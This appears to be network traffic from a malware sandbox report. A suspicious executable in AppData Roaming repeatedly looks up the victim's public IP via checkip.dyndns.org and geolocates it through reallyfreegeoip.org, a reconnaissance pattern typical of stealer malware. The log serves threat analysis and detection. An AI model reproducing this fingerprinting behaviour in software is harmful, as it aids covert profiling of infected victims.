                                              4192.168.2.2249169193.122.130.0803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:34.108732939 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:36.902781963 CEST730INHTTP/1.1 502 Bad Gateway
                                              Date: Thu, 26 Sep 2024 05:47:36 GMT
                                              Content-Type: text/html
                                              Content-Length: 547
                                              Connection: keep-alive
                                              X-Request-ID: 7dc8b858a6e7e988bd9894f0a4541ab7
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Sep 26, 2024 07:47:36.928631067 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:38.056256056 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 42b1484b806858b2999286d7b77cb276
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:38.455374002 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 42b1484b806858b2999286d7b77cb276
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249171132.226.247.73803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:38.733093023 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:39.400791883 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 595186ec89957bacc70277888b322a3e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:40.517016888 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 595186ec89957bacc70277888b322a3e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:40.517060041 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 595186ec89957bacc70277888b322a3e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:40.517472029 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 595186ec89957bacc70277888b322a3e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249173193.122.6.168803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:40.716159105 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 07:47:41.426959991 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 36c0ba1084d7495f3a8ecdf002a1820d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249175193.122.130.0803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:42.379395962 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 07:47:42.836105108 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3847cef5376bab9e05f814d095deb179
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:43.041966915 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3847cef5376bab9e05f814d095deb179
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249163188.114.96.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:30 UTC680INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:30 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81709
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lgKGkPWSydkPC1VsapkH3AYsOCkmpGPxWRMIpViaebsanb579Z96nCw8ElkUnPhSK%2FdrzPnUugxJxogZysRmuGhXZu%2FBlU8bSbGxFIqEUg%2Ba78%2FBnQqdWxAHAxTpt62eZDXTp3%2F"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5a9491e43c5-EWR
                                              2024-09-26 05:47:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249164188.114.96.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 05:47:31 UTC676INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:31 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81710
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTeFNkR%2FS3sZt81BRDxml9zkXezNxgwuQlTqzunqybfglwd50fJRy4iNqEkN8WNvMGbQv8c7nhKA%2F7WcBWfLda3AkXqyCqqHu9qgzsa2Ihz0lu9GkX%2BiZrfJvOarol05Tt4k26Gp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5b058cb41ec-EWR
                                              2024-09-26 05:47:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249166188.114.96.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:32 UTC680INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:32 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81711
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6soq7OZyKT6g%2Fu5%2BeH0C7YarsHo0agRHXkemCAtsL7z%2FDzcqvWcNT5MbWAqEica0yhp0VyQwvApHJJNd%2F9pt75DYLZmZWuVlzXw60%2FNoIajjPD1X2V7ApvmMRLS8m74UXame7NfA"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5b8a8051982-EWR
                                              2024-09-26 05:47:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249168188.114.97.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:33 UTC676INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81712
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1vFCz3JDxSoeP673ZInDfonITXMczHAniIjDM3hAOw1lLIJX0Y9VHs%2FmKTjHp%2B8%2BhguHnLWZYWVmzJUgzm9YYlDNrVYzQ5OR1D9Sez4vld37njcFMyvKn8x3I2wmtdi893tJH6Oc"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5c0ff830f4d-EWR
                                              2024-09-26 05:47:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249170188.114.96.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:38 UTC680INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:38 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81717
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUHGF3n1JAWAMn5XCoKxTz8li7GejeXZ14v97TrfZeRi3YZfbdjbahM%2BXuu8%2BHwbzz56QF2ToPVFLxu3v9I6VcBFu7tzBL7F1P%2FbllUBPp6a8m3%2BBbKFN7p%2BrtOxH4zccHqHBpal"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5de6b1fc34a-EWR
                                              2024-09-26 05:47:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249172188.114.97.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:40 UTC708INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:40 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81719
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U07zgAf4v%2FMkVtUfgWEvKp9ZgauIADV3qq31EUfcv5zp569zAhJwccPq6ToPfFDob%2BT8IOyWrQtwLFx%2BzelxJ%2Bhfwu97Hu8L0Jr0LSSQrzT0OImkWWu7jes2w6mKYBFnqchbe4Uk"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5eadd481811-EWR
                                              alt-svc: h3=":443"; ma=86400
